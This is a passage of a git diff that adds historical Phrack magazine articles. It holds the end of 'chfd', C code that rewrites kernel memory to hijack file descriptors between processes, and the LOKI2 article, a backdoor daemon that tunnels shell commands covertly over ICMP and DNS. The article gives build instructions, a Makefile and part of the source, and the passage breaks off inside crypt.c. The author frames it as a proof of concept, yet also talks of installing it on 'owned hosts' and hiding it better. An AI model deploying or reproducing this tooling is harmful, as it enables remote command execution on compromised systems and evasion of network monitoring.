+      fprintf(stderr, "fds changed in memory while using them - try again\n");
+      exit(1);
+    }
+    writeval(ad2, val1);
+    writeval(ad3, val2);
+    writeval(ad1, val3);
+  } else {
+    if (readval(ad1)!=val1 || readval(ad2)!=val2) {
+      fprintf(stderr, "fds changed in memory while using them - try again\n");
+      exit(1);
+    }
+    writeval(ad1, val2);
+    writeval(ad2, val1);
+  }
+  printf("Done!\n");
+}
+
+<-->
+
+The FreeBSD code
+----------------
+
+<++> fd_hijack/chfd-freebsd.c
+
+/*  chfd - exchange fd's between 2 or 3 running processes.
+ *  
+ *  This was written for FreeBSD and is *very* system-specific.  Needs 
+ *  read/write access to /dev/mem and /dev/kmem; only root can usually 
+ *  do that, and only if the system is running at securelevel -1.
+ *
+ *  Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3]
+ *  Compile with: gcc chfd.c -o chfd -lkvm
+ *
+ *  With two sets of arguments, exchanges a couple of fd between the 
+ *  two processes.
+ *  With three sets, the second process gets the first's fd, the third 
+ *  gets the second's fd, and the first gets the third's fd.
+ *
+ *  Note that this is inherently unsafe, since we're messing with kernel
+ *  variables while the kernel itself might be changing them.  It works
+ *  in practice, but no self-respecting program would want to do this.
+ *
+ *  Written by: orabidoo <odar@pobox.com>
+ *  FreeBSD version: 4 May 97
+ */
+
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <kvm.h>
+#include <sys/proc.h>
+
+#define NEXTP ((char *)&p.p_list.le_next - (char *)&p)
+#define FILES ((char *)&p.p_fd - (char *)&p)
+#define AD(fd) (readvalz(readvalz(procp + FILES)) + 4*(fd))
+
+kvm_t *kfd;
+struct proc p;
+u_long procp, allproc;
+struct nlist nm[2];
+
+u_long readval(u_long ad) {
+  u_long val;
+
+  if (kvm_read(kfd, ad, &val, 4) != 4)
+    fprintf(stderr, "error reading...\n"), exit(1);
+  return val;
+}
+
+u_long readvalz(u_long ad) {
+  u_long r = readval(ad);
+  if (r == 0)
+    fprintf(stderr, "NULL pointer found (fd not open?)\n"), exit(1);
+  return r;
+}
+
+void writeval(u_long ad, u_long val) {
+  if (kvm_write(kfd, ad, &val, 4) != 4)
+    fprintf(stderr, "error writing...\n"), exit(1);
+}
+
+void readproc(u_long ad) {
+  if (kvm_read(kfd, ad, &p, sizeof(struct proc)) != sizeof(struct proc))
+    fprintf(stderr, "error reading a struct proc...\n"), exit(1);
+}
+
+void findproc(int pid) {
+  u_long adr;
+
+  for (adr = readval(allproc); adr; adr = readval(adr + NEXTP)) {
+    procp = adr;
+    readproc(procp);
+    if (p.p_pid == pid) return;
+  }
+  fprintf(stderr, "Process not found\n");
+  exit(1);
+}
+
+int main(int argc, char **argv) {
+  int pid1, fd1, pid2, fd2, pid3, fd3;
+  u_long ad1, val1, ad2, val2, ad3, val3;
+  int three=0;
+
+  if (argc != 5 && argc != 7)
+    fprintf(stderr, "Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]\n", argv[0]), 
+    exit(1);
+
+  pid1 = atoi(argv[1]), fd1 = atoi(argv[2]);
+  pid2 = atoi(argv[3]), fd2 = atoi(argv[4]);
+  if (argc == 7)
+    pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1;
+
+  if (pid1 == 0)
+    pid1 = getpid(), fd1 = open("/dev/null", O_RDWR);
+  if (pid2 == 0)
+    pid2 = getpid(), fd2 = open("/dev/null", O_RDWR);
+  if (three && pid3 == 0)
+    pid3 = getpid(), fd3 = open("/dev/null", O_RDWR);
+
+  kfd = kvm_open(NULL, NULL, NULL, O_RDWR, "chfd");
+  if (kfd == NULL) exit(1);
+
+  bzero(nm, 2*sizeof(struct nlist));
+  nm[0].n_name = "_allproc";
+  nm[1].n_name = NULL;
+  if (kvm_nlist(kfd, nm) != 0)
+    fprintf(stderr, "Can't read kernel name list\n"), exit(1);
+  allproc = nm[0].n_value;
+
+  findproc(pid1);
+  ad1 = AD(fd1);
+  val1 = readvalz(ad1);
+  printf("Found fd pointer 1, value %.8x, stored at %.8x\n", val1, ad1);
+
+  findproc(pid2);
+  ad2 = AD(fd2);
+  val2 = readvalz(ad2);
+  printf("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2);
+
+  if (three) {
+    findproc(pid3);
+    ad3 = AD(fd3);
+    val3 = readvalz(ad3);
+    printf("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3);
+  }
+
+  if (three) {
+    if (readval(ad1)!=val1 || readval(ad2)!=val2 || readval(ad3)!=val3) {
+      fprintf(stderr, "fds changed in memory while using them - try again\n");
+      exit(1);
+    }
+    writeval(ad2, val1);
+    writeval(ad3, val2);
+    writeval(ad1, val3);
+  } else {
+    if (readval(ad1)!=val1 || readval(ad2)!=val2) {
+      fprintf(stderr, "fds changed in memory while using them - try again\n");
+      exit(1);
+    }
+    writeval(ad1, val2);
+    writeval(ad2, val1);
+  }
+  printf("Done!\n");
+}
+
+<-->
+
+----[  EOF
+
diff --git a/phrack51/6.txt b/phrack51/6.txt
new file mode 100644
index 0000000..a3a6455
--- /dev/null
+++ b/phrack51/6.txt
@@ -0,0 +1,3370 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 06 of 17
+
+
+-------------------------[  L O K I 2   (the implementation)
+
+
+--------[  daemon9 <route@infonexus.com>
+
+
+
+----[  Introduction
+
+            
+    This is the companion code to go with the article on covert channels in
+network protocols that originally appeared in P49-06.  The article does not
+explain the concepts, it only covers the implementation.  Readers desiring more
+information are directed to P49-06.
+
+    LOKI2 is an information-tunneling program.  It is a proof of concept work 
+intending to draw attention to the insecurity that is present in many network 
+protocols.  In this implementation, we tunnel simple shell commands inside of 
+ICMP_ECHO / ICMP_ECHOREPLY and DNS namelookup query / reply traffic.  To the 
+network protocol analyzer, this traffic seems like ordinary benign packets of 
+the corresponding protocol.  To the correct listener (the LOKI2 daemon) 
+however, the packets are recognized for what they really are.  Some of the
+features offered are: three different cryptography options and on-the-fly 
+protocol swapping (which is a beta feature and may not be available in your 
+area).
+
+    The vulnerabilities presented here are not new.  They have been known
+about and actively exploited for years.  LOKI2 is simply one possible 
+implementation.  Implementations of similar programs exist for UDP, TCP, IGMP,
+etc...  This is by no means limited to type 0 and type 8 ICMP packets.
+
+    Before you go ahead and patch owned hosts with lokid, keep in mind that
+when linked against the crypto libraries, it is around 70k, with about 16k 
+alone in the data segment.  It also forks off at least twice per client 
+request.  This is not a clandestine program.  You want clandestine?
+Implement LOKI2 as an lkm, or, even better, write kernel diffs and make it
+part of the O/S.
+
+
+----------------------[  BUILDING AND INSTALLATION
+
+    Building LOKI2 should be painless.  GNU autoconf was not really needed for 
+this project;  consequently you may have to edit the Makefile a bit.  This 
+shouldn't be a problem, becuase you are very smart.
+
+
+----[  I. Edit the toplevel Makefile
+
+1)  Make sure your OS is supported.  As of this distribution, we suppport the
+    following (if you port LOKI2 to another architecture, please send me the
+    diffs):
+
+                Linux   2.0.x 
+                OpenBSD 2.1
+                FreeBSD 2.1.x
+                Solaris 2.5.x
+
+2)  Pick an encryption technology.  STRONG_CRYPTO (DH and Blowfish), 
+    WEAK_CRYPTO (XOR), or NO_CRYPTO (data is transmitted in plaintext).
+
+3)  If you choose STRONG_CRYPTO, uncomment LIB_CRYPTO_PATH, CLIB, and MD5_OBJ.
+    You will also need SSLeay (see below).
+
+4)  Chose whether or not to allocate a psudeo terminal (PTY) (may not be 
+    implemented) or just use popen (POPEN) and use the 
+    `pipe -> fork -> exec -> sh` sequence to execute commands. 
+
+5)  See Net/3 restrictions below and adjust accordingly.
+
+6)  Pausing between sends is a good idea, especially when both hosts are on
+    the same Ethernet.  We are dealing with a potentially lossy protocol and 
+    there is no reliablity layer added as of this version...  SEND_PAUSE 
+    maintains some order and keeps the daemon from spewing packets too fast.
+
+    You can also opt to increase the pause to a consdiderably larger value, 
+    making the channel harder to track on the part of the netework snooper.
+    (This would, of course, necessitate the client to choose an even larger
+    MIN_TIMEOUT value.
+
+----[  II. Supplemental librarys
+
+1)  If you are using STRONG_CRYPTO you will need to get the SSLeay crypto 
+    library, version 0.6.6.  DO NOT get version 0.8.x as it is untested with
+    LOKI2.  Hopefully these URLs will not expire anytime soon:
+  
+            ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-0.6.6.tar.gz
+            ftp://ftp.uni-mainz.de/pub/internet/security/ssl
+
+2)  Build and install SSLeay.  If you decide not to install it, Make sure you 
+    correct the crypto library path LIB_CRYPTO_PATH in the Makefile and 
+    include paths in loki.h.
+
+
+
+----[  III. Compilation and linking
+
+1)  From the the toplevel directory, `make systemtype`.
+
+2)  This will build and strip the executables.
+
+
+
+----[  IV. Testing
+
+1)  Start the daemon in verbose mode using ICMP_ECHO (the default) `./lokid`
+
+2)  Start up a client `./loki -d localhost`
+
+3)  Issue an `ls`.
+
+4)  You should see a short listing of the root directory.
+
+5)  Yay.
+
+6) For real world testing, install the daemon on a remote machine and go to 
+   town.  See below for potential problems.
+
+
+----[  V. Other Options
+
+    The loki.h header file offers a series of configurable options.
+
+MIN_TIMEOUT is the minimum amount of time in whole seconds the client will 
+            wait for a response from the server before the alarm timer goes off.
+
+MAX_RETRAN  (STRONG_CRYPTO only) is the maximum amount of time in whole 
+            seconds the client will retransmit its initial public key 
+            handshaking packets before giving up.  This feature will be 
+            deprecated when a reliability layer is added.
+
+MAX_CLIENT  is the maximum amount of clients the server will accept and
+            service concurrently.
+
+KEY_TIMER   is the maximum amount of time in whole seconds an idle client 
+            entry will be allowed to live in the servers database.  If this
+            amount of time has elapsed, all entries in the servers client 
+            database that have been inactive for KEY_TIMER seconds will be
+            removed.  This provides the server with a simple way to clean up
+            resources from crashed or idle clients.
+
+
+
+----------------------[  LOKI2 CAVEATS AND KNOWN BUGS
+
+ Net/3 Restrictions
+
+    Under Net/3, processes interested in receiving ICMP messages must register
+with the kernel in order to get these messages.  The kernel will then pass
+all ICMP messages to these registered listeners, EXCEPT for damaged ICMP 
+packets and request packets.  Net/3 TCP/IP implementations will not pass ICMP 
+request messages of any kind to any registered listeners.  This is a problem
+if we are going to be using ICMP_ECHO (a request type packet) and want it to
+be directly passed to our user-level program (lokid).  We can get around this
+restriction by inverting the flow of the transactions.  We send ICMP_ECHOREPLYs
+and elicit ICMP_ECHOs.
+  
+    Note, that under Linux, we do not have this probem as ALL valid ICMP 
+packets are delivered to user-level processes.  If the daemon is installed on 
+a Linux box, we can use the normal ICMP_ECHO -> ICMP_ECHOREPLY method of 
+tunneling.  Compile with -DNET3 according to this chart:
+
+       | Client  |
+-----------------------------------------------------
+Daemon | ------- |   Linux  |   *bsd*   |   Solaris |    
+-----------------------------------------------------
+       | Linux   |   no     |    yes    |   yes     |
+       | *bsd*   |   no     |    yes    |   yes     |
+       | Solaris |   no     |    opt    |   opt     |
+
+
+ The Initialization Vector
+
+    When using Strong Crypto, the initialization vector (ivec) incrementation 
+is event based.  Every time a packet is sent by the client the client ivec is 
+incremented, and, every time a packet is received by the server, the server 
+side ivec is also incremented.  This is fine if both ends stay in sync with
+each other.  However, we are dealing with a potentially lossy protocol.  If
+a packet from the client to the server is dropped, the ivecs become desynched,
+and the client can no longer communicate with the server.
+
+    There are two easy ways to deal with this.  One would be to modify the ivec
+permutation routine to be time-vector based, having the ivecs increase as time 
+goes by.  This is problematic for several reasons.  Initial synchronization 
+would be difficult, especially on different machine architectures with 
+different clock interrupt rates.  Also, we would also have to pick a 
+relatively small time interval for ivec permutations to be effective on fast 
+networks, and the smaller the ivec time differential is, the more the protocol 
+would suffer from clock drift (which is actually quite considerable).
+
+
+ Protocol Swaping
+
+    Swapping protocols is broken in everything but Linux.  I think it has 
+something to do with the Net/3 socket semantics.  This is probably just a bug
+I need to iron out.  Quite possibly something I did wrong.  *shrug*...
+Nevermind the fact that the server isn't doing any synchronous I/O multiplexing, 
+consequently, swapping protocols requires a socket change on everone's part.  
+This is why this feature is 'beta'.
+
+
+ Authentication
+
+    Um, well, there is none.  Any client can connect to the server, and any
+client can also cause the server to shut down.  This is actually not a bug or 
+a caveat.  It is intentional.
+
+ 
+ I/O
+
+    Should be done via select.
+
+----------------------[  TODO LIST
+
+- possible time vector-based ivec permutation instead of event-based as event 
+  based is prone to synch failures, OR, even better, a reliability layer.
+
+
+
+----[  The technologies 
+
+
+----------------------[  SYMMETRIC BLOCK CIPHER
+
+    A symmetric cipher is one that uses the same key for encryption and
+decryption, or the decryption key is easily derivable from the encryption key.
+Symmetric ciphers tend to be fast and well suited for bulk encryption, but
+suffer from woeful key distribution problems.  A block cipher is simply one
+that encrypts data in blocks (usually 64-bits).  The symmetric block cipher 
+employed by LOKI2 is Blowfish in CFB mode with a 128-bit key.
+
+
+----------------------[  CFB MODE
+
+    Symmetric block ciphers can be implemented as self-synchronizing stream
+ciphers.  This is especially useful for data that is not suitable for padding
+or when data needs to processed in byte-sized chunks.  In CFB mode, data is
+encrypted in units smaller then the block size.  In our case, each encryption 
+of the 64-bit block cipher encrypts 8-bits of plaintext.  The initialization
+vector, which is used to seed the process, must be unique but not secret.  We
+use every 3rd byte of the symmetric key for our IV.  The IV must change for
+each message, to do this, we simply increment it as packets are generated.
+
+
+----------------------[  BLOWFISH
+
+    Blowfish is a variable key length symmetric cipher designed by Bruce 
+Schneier.  It is a portable, free, fast, strong algorithm.
+It offers a key length of up to 448-bits, however, for LOKI2 we use 
+a 128-bit key.
+
+
+----------------------[  ASYMMETRIC CIPHER
+
+    An asymmetric cipher makes use of two keys, coventionally called the
+private key and public key.  These two keys are mathematically related such
+that messages encrypted with one, can only be decrypted by the other.  It
+is also infeasible to derive one key from the other.  Asymmetric ciphers solve
+the problem of key management by negating the need for a shared secret, however
+they are much slower the symmetric ciphers.  The perfect world in this case
+is a hybrid system, using both a symmetric cipher for key exchange and a 
+symmetric cipher for encryption.  This is the scheme employed in LOKI2.
+
+
+---------------------[  DIFFIE - HELLMAN
+
+    In 1976, Whitfield Diffie and Marty Hellman came forth with the first
+asymmetric cipher (DH).  DH cannot be used for encryption, only for symmetric 
+key exchange.  The strength of DH relies on the apparent difficulty in 
+computing discrete logarithms in a finite field.  DH generates a shared secret 
+based off of 4 components:
+
+    P           the public prime
+    g           the public generator
+    c{x, X}     the client's private/public keypair
+    s{y, Y}     the server's private/public keypair
+    SS          the shared secret (from the which the key is extracted)
+
+The protocol for secret generation is simple:
+
+        Client                          Server
+        ------                          ------
+1)    X = g ^ x mod P
+2)                           X -->
+3)                                    Y = g ^ y mod P
+4)                       <-- Y
+5)    SS = Y ^ x mod P                SS = X ^ y mod P
+
+
+----------------------[  NETWORK FLOW
+
+    L O K I 2
+    Covert channel implementation for Unix
+    ----------------------------------------------------------------------
+                                                daemon9|route [guild 1997]
+  ----------------
+  | LOKI2 CLIENT |
+  ----------------           -----------------------------------
+   ^      |  sendto()        |  FIRST GENERATION LOKI2 DAEMON  |
+   |      |                  -----------------------------------
+   |      |  client sends     |  shadow()     server forks
+   |      |  data             v
+   |      v                   |      
+   |      |               -----    
+   |      |               |     
+   |      |               |   
+   |      |               v fork()
+   |      |             -----
+   |      |            C|   |P   
+   |      v             |   |   
+   |      |             |   ----> clean_exit()          parent exits
+   |      |             |
+   |      |             |  2nd generation child daemon becomes leader of a new 
+   |      |             |  session, handles initial network requests    
+   ^      |             |  
+   |      |             v
+   |      |            ------------------------------
+   |      -----------> |  SECOND GENERATION DAEMON  | read()    blocks until
+   |      LOKI2        ------------------------------           data arrives
+   |      network             |          ^
+   |      traffic             |          |
+   |                          |          |
+   -------<----               |          |
+              |               |          |
+              |               |          |
+              |               |          |
+              |               v fork()   |
+              |             -----        |
+              ^            C|   |P       |
+              |             |   |        | parent continues
+              |             |   --->------
+              |             | 
+              |             |  3rd generation daemon handles client request
+              |             v
+              |     -----------------------------
+              --<---|  THIRD GENERATION DAEMON  |  
+                    -----------------------------
+                        switch(PACKET_TYPE)
+
+                    L_PK_REQ:             L_REQ:
+                     STRONG_CRYPTO           POPEN
+                     key management    PTY     |
+                                        |     pipe()  <---------
+                                        |      |               |
+     -------<--------------------<------       |               |
+     |                                      ----               |
+     |                                      |                  |
+     |                                      v fork()           |
+     v                                    -----                |
+  Unimplemented (7.97)                   C|   |P               |
+                                          |   |                ^
+                                          |   ----> exit()     |
+                                          |                    |
+                 4th generation child     |     ---->------->---
+                 daemon execs commands    v     |
+                      ------------------------------ 
+                      |  FOURTH GENERATION DAEMON  |  exec()     4g child execs 
+                      ------------------------------             command in
+                        STDOUT of command                        /bin/sh 
+                        to client via pipe
+
+
+
+----------------------[  THANKS
+
+    snocrash for being sno,
+    nirva for advice and help and the use of his FreeBSD machine,
+    mycroft for advice and the use of his Solaris machine, 
+    alhambra for being complacent,
+    Craig Nottingham for letting me borrow some nomenclature,
+    truss and strace for being indespensible tools of the trade, 
+
+    Extra Special Thanks to OPii <opii@dhp.com> for pioneering this concept and
+    technique.
+
+
+----------------------[  THE SOURCE
+    
+    Whelp, here it is.  Extract the code from the article using one of the 
+included extraction utilities.  
+
+<++> L2/Makefile
+# Makefile for LOKI2 Sun Jul 27 21:29:28 PDT 1997 
+# route (c) 1997 Guild Corporation, Worldwide
+
+
+######
+#   Choose a cryptography type
+#
+
+CRYPTO_TYPE 		=   WEAK_CRYPTO         # XOR
+#CRYPTO_TYPE 		=   NO_CRYPTO           # Plaintext
+#CRYPTO_TYPE 		=   STRONG_CRYPTO       # Blowfish and DH
+
+
+######
+#   If you want STRONG_CRYPTO, uncomment the following (and make sure you have
+#   SSLeay)
+
+#LIB_CRYPTO_PATH 	=   /usr/local/ssl/lib/
+#CLIB             	=   -L$(LIB_CRYPTO_PATH) -lcrypto
+#MD5_OBJ          	=   md5/md5c.o
+
+
+######
+#   Choose a child process handler type
+#
+
+SPAWN_TYPE       	=   POPEN 
+#SPAWN_TYPE      	=   PTY
+
+
+######
+#   It is safe to leave this alone.
+#
+
+NET3       	        =   #-DNET3
+SEND_PAUSE       	=   SEND_PAUSE=100 
+DEBUG                   =   #-DDEBUG
+#----------------------------------------------------------------------------#
+
+
+i_hear_a_voice_from_the_back_of_the_room:
+	@echo 
+	@echo "LOKI2 Makefile"
+	@echo "Edit the Makefile and then invoke with one of the following:"
+	@echo 
+	@echo "linux openbsd freebsd solaris    clean"
+	@echo 
+	@echo "See Phrack Magazine issue 51 article 7 for verbose instructions"
+	@echo 
+
+linux:
+	@make OS=-DLINUX CRYPTO_TYPE=-D$(CRYPTO_TYPE)                       \
+	SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)               \
+	FAST_CHECK=-Dx86_FAST_CHECK IP_LEN= all
+
+openbsd:
+	@make OS=-DBSD4 CRYPTO_TYPE=-D$(CRYPTO_TYPE)                        \
+	SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)               \
+	FAST_CHECK=-Dx86_FAST_CHECK IP_LEN= all
+
+freebsd:
+	@make OS=-DBSD4 CRYPTO_TYPE=-D$(CRYPTO_TYPE)                        \
+	SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)               \
+	FAST_CHECK=-Dx86_FAST_CHECK IP_LEN=-DBROKEN_IP_LEN all
+
+solaris:
+	@make OS=-DSOLARIS CRYPTO_TYPE=-D$(CRYPTO_TYPE)                     \
+	SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)               \
+	LIBS+=-lsocket LIBS+=-lnsl IP_LEN= all
+
+CFLAGS		= -Wall -O6 -finline-functions -funroll-all-loops $(OS)     \
+		$(CRYPTO_TYPE) $(SPAWN_TYPE) $(SEND_PAUSE) $(FAST_CHECK)    \
+		$(EXTRAS) $(IP_LEN) $(DEBUG) $(NET3)
+
+CC		=   gcc
+C_OBJS	        =   surplus.o crypt.o
+S_OBJS	        =   client_db.o shm.o surplus.o crypt.o pty.o
+
+
+.c.o:
+	$(CC) $(CFLAGS) -c $< -o $@
+
+all:	$(MD5_OBJ) loki
+
+md5obj: md5/md5c.c
+	@( cd md5; make )
+
+loki:	$(C_OBJS) loki.o $(S_OBJS) lokid.o
+	$(CC) $(CFLAGS) $(C_OBJS) $(MD5_OBJ) loki.c -o loki $(CLIB) $(LIBS)
+	$(CC) $(CFLAGS) $(S_OBJS) $(MD5_OBJ) lokid.c -o lokid $(CLIB) $(LIBS)
+	@(strip loki lokid)
+
+clean:
+	@( rm -fr *.o loki lokid )
+	@( cd md5; make clean )
+
+dist:	clean
+	@( cd .. ; tar cvf loki2.tar L2/ ; gzip loki2.tar )
+<--> Makefile
+<++> L2/client_db.c
+/*
+ * LOKI2
+ *
+ * [ client_db.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9]
+ */
+
+
+#include "loki.h"
+#include "shm.h"
+#include "client_db.h"
+
+extern struct loki rdg;
+extern int verbose;
+extern int destroy_shm;
+extern struct client_list *client;
+extern u_short c_id;
+
+#ifdef  STRONG_CRYPTO
+extern short ivec_salt;
+extern u_char user_key[BF_KEYSIZE];
+#endif
+#ifdef  PTY
+extern int mfd;
+#endif
+       
+/*
+ *  The server maintains an array of active client information.  This
+ *  function simply steps through the structure array and attempts to add
+ *  an entry.
+ */
+
+int add_client(u_char *key)
+{
+    int i = 0, emptyslot = -1;                                    
+#ifdef  PTY
+    char p_name[BUFSIZE] = {0};
+#endif
+
+    locks();
+    for (; i < MAX_CLIENT; i++)
+    {
+        if (IS_GOOD_CLIENT(rdg))
+        {                               /* Check for duplicate entries 
+                                         * (which are to be expected when
+                                         * not using STRONG_CRYPTO)
+                                         */
+#ifdef STRONG_CRYPTO
+            if (verbose) fprintf(stderr, S_MSG_DUP);
+#endif
+            emptyslot = i;
+            break;
+        }                               /* tag the first empty slot found */
+        if ((!(client[i].client_id))) emptyslot = i;
+    }
+    if (emptyslot == -1)
+    {                                   /* No empty array slots */
+        if (verbose) fprintf(stderr, "\nlokid: Client database full");
+        ulocks();
+        return (NNOK);
+    }
+                                        /* Initialize array with client info */
+    client[emptyslot].touchtime         = time((time_t *)NULL);
+    if (emptyslot != i){
+        client[emptyslot].client_id     = c_id;
+        client[emptyslot].client_ip     = rdg.iph.ip_src;
+        client[emptyslot].packets_sent  = 0;
+        client[emptyslot].bytes_sent    = 0;
+        client[emptyslot].hits          = 0;
+#ifdef  PTY
+        client[emptyslot].pty_fd        = 0;
+#endif
+    }
+#ifdef  STRONG_CRYPTO
+                                        /* copy unset bf key and set salt */
+    bcopy(key, client[emptyslot].key, BF_KEYSIZE);
+    client[emptyslot].ivec_salt         = 0;
+#endif
+    ulocks();
+    return (emptyslot);
+}                
+
+
+/*
+ *  Look for a client entry in the client database.  Either copy the clients
+ *  key into user_key and update timestamp, or clear the array entry,
+ *  depending on the disposition of the call.
+ */
+
+int locate_client(int disposition)
+{
+    int i = 0;
+
+    locks();
+    for (; i < MAX_CLIENT; i++)
+    {
+        if (IS_GOOD_CLIENT(rdg))
+        {
+            if (disposition == FIND)    /* update timestamp */
+            {
+                client[i].touchtime = time((time_t *)NULL);
+#ifdef STRONG_CRYPTO
+                                        /* Grab the key */
+                bcopy(client[i].key, user_key, BF_KEYSIZE);
+#endif
+            }  
+                                        /* Remove entry */
+            else if (disposition == DESTROY)
+                bzero(&client[i], sizeof(client[i]));
+            ulocks();
+            return (i);
+        }
+    }
+    ulocks();                           /* Didn't find the client */
+    return (NNOK);
+}
+
+
+/*
+ *  Fill a string with current stats about a particular client.
+ */
+
+int stat_client(int entry, u_char *buf, int prot, time_t uptime)
+{
+
+    int n = 0;
+    time_t now = 0;
+    struct protoent *proto = 0;  
+                                        /* locate_client didn't find an 
+                                         * entry
+                                         */
+    if (entry == NNOK)
+    {
+ fprintf(stderr, "DEBUG: stat_client nono\n");
+        return (NOK);
+    }
+    n = sprintf(buf, "\nlokid version:\t\t%s\n", VERSION);
+    n += sprintf(&buf[n], "remote interface:\t%s\n", host_lookup(rdg.iph.ip_dst));
+
+    proto = getprotobynumber(prot);
+    n += sprintf(&buf[n], "active transport:\t%s\n", proto -> p_name);
+    n += sprintf(&buf[n], "active cryptography:\t%s\n", CRYPTO_TYPE);
+    time(&now);
+    n += sprintf(&buf[n], "server uptime:\t\t%.02f minutes\n", difftime(now, uptime) / 0x3c);
+                                                               
+    locks();
+    n += sprintf(&buf[n], "client ID:\t\t%d\n",      client[entry].client_id);
+    n += sprintf(&buf[n], "packets written:\t%ld\n", client[entry].packets_sent);
+    n += sprintf(&buf[n], "bytes written:\t\t%ld\n", client[entry].bytes_sent);
+    n += sprintf(&buf[n], "requests:\t\t%d\n",       client[entry].hits);
+    ulocks();
+    
+    return (n);
+}
+
+/*
+ *  Unsets alarm timer, then calls age_client, then resets signal handler
+ *  and alarm timer.
+ */
+
+void client_expiry_check(){
+
+    alarm(0);
+    age_client();
+                                            /* re-establish signal handler */
+    if (signal(SIGALRM, client_expiry_check) == SIG_ERR)
+        err_exit(1, 1, verbose, "[fatal] cannot catch SIGALRM");
+
+    alarm(KEY_TIMER);
+}
+     
+
+/*
+ *  This function is called every KEY_TIMER interval to sweep through the 
+ *  client list.  It zeros any entrys it finds that have not been accessed
+ *  in KEY_TIMER seconds.  This gives us a way to free up entries from clients 
+ *  which may have crashed or lost their QUIT_C packet in transit.
+ */
+
+void age_client()
+{
+
+    time_t timestamp = 0;
+    int i = 0;
+
+    time(&timestamp); 
+    locks();
+    for (; i < MAX_CLIENT; i++)
+    {
+        if (client[i].client_id)
+        {
+            if (difftime(timestamp, client[i].touchtime) > KEY_TIMER)
+            {
+                if (verbose) fprintf(stderr, "\nlokid: inactive client <%d> expired from list [%d]\n", client[i].client_id, i);
+                bzero(&client[i], sizeof(client[i]));
+#ifdef STRONG_CRYPTO
+                ivec_salt = 0;
+#endif
+            }
+        }
+    }
+    ulocks();
+}
+
+
+/*
+ *  Update the statistics for client.
+ */
+
+void update_client(int entry, int pcount, u_long bcount)
+{
+    locks();
+    client[entry].touchtime      = time((time_t *)NULL);
+    client[entry].packets_sent  += pcount; 
+    client[entry].bytes_sent    += bcount;
+    client[entry].hits          ++;
+    ulocks();
+}
+
+
+/*
+ *  Returns the IP address and ID of the targeted entry
+ */
+
+u_long check_client_ip(int entry, u_short *id)
+{
+    u_long ip = 0;
+
+    locks();
+    if ((*id = (client[entry].client_id))) ip = client[entry].client_ip;
+    ulocks();
+    
+    return (ip);
+}
+
+#ifdef STRONG_CRYPTO
+
+/*
+ *  Update and return the IV salt for the client
+ */
+
+u_short update_client_salt(int entry)
+{
+
+    u_short salt = 0;
+
+    locks();
+    salt = ++client[entry].ivec_salt;
+    ulocks();
+
+    return (salt);
+}    
+
+#endif  /* STRONG_CRYPTO */
+
+
+/* EOF */
+<--> client_db.c
+<++> L2/client_db.h
+/*
+ * LOKI
+ *
+ * client_db header file
+ *
+ *  1996/7 Guild Corporation Productions    [daemon9]
+ */
+ 
+
+/*
+ *  Client info list.  
+ *  MAX_CLIENT of these will be kept in a server-side array
+ */
+
+struct client_list
+{
+#ifdef  STRONG_CRYPTO
+    u_char key[BF_KEYSIZE];             /* unset bf key                     */
+    u_short ivec_salt;                  /* the IV salter                    */
+#endif
+    u_short client_id;                  /* client loki_id                   */
+    u_long client_ip;                   /* client IP address                */
+    time_t  touchtime;                  /* last time entry was hit          */
+    u_long packets_sent;                /* Packets sent to this client      */
+    u_long bytes_sent;                  /* Bytes sent to this client        */
+    u_int hits;                         /* Number of queries from client    */
+#ifdef  PTY
+    int pty_fd;                         /* Master PTY file descriptor       */
+#endif
+};
+
+#define IS_GOOD_CLIENT(ldg)\
+\
+(c_id           == client[i].client_id   &&  \
+ ldg.iph.ip_src == client[i].client_ip)  >   \
+                             (0) ? (1) : (0) \
+
+void update_client(int, int, u_long);   /* Update a client entry            */
+                                        /* client info into supplied buffer */
+int stat_client(int, u_char *, int, time_t);
+int add_client(u_char *);               /* add a client entry               */
+int locate_client(int);                 /* find a client entry              */
+void age_client(void);                  /* age a client from the list       */
+u_short update_client_salt(int);        /* update and return salt           */
+u_long check_client_ip(int, u_short *); /* return ip and id of target       */
+<--> client_db.h
+<++> L2/crypt.c
+/*
+ * LOKI2
+ *
+ * [ crypt.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9]
+ */
+ 
+
+#include "loki.h"
+#include "crypt.h"
+#include "md5/global.h"
+#include "md5/md5.h"
+
+#ifdef STRONG_CRYPTO
+u_char user_key[BF_KEYSIZE];                /* unset blowfish key */
+BF_KEY bf_key;                              /* set key */
+volatile u_short ivec_salt = 0;           
+
+
+/*
+ *  Blowfish in cipher-feedback mode.  This implements blowfish (a symmetric 
+ *  cipher) as a self-synchronizing stream cipher.  The initialization 
+ *  vector (the initial dummy cipher-text block used to seed the encryption)
+ *  need not be secret, but it must be unique for each encryption.  I fill
+ *  the ivec[] array with every 3rd key byte incremented linear-like via
+ *  a global encryption counter (which must be synced in both client and
+ *  server).
+ */
+
+void blur(int m, int bs, u_char *t)
+{
+
+    int i = 0, j = 0, num      = 0;
+    u_char ivec[IVEC_SIZE + 1] = {0};       
+
+    for (; i < BF_KEYSIZE; i += 3)         /* fill in IV */
+        ivec[j++] = (user_key[i] + (u_char)ivec_salt);     
+    BF_cfb64_encrypt(t, t, (long)(BUFSIZE - 1), &bf_key, ivec, &num, m);
+}
+
+
+/*
+ *  Generate DH keypair.
+ */
+
+DH* generate_dh_keypair()
+{
+
+    DH *dh = NULL;
+                                        /* Initialize the DH structure */
+    dh = DH_new();
+                                        /* Convert the prime into BIGNUM */
+    (BIGNUM *)(dh -> p) = BN_bin2bn(modulus, sizeof(modulus), NULL);
+                                        /* Create a new BIGNUM */
+    (BIGNUM *)(dh -> g) = BN_new();
+                                        /* Set the DH generator */
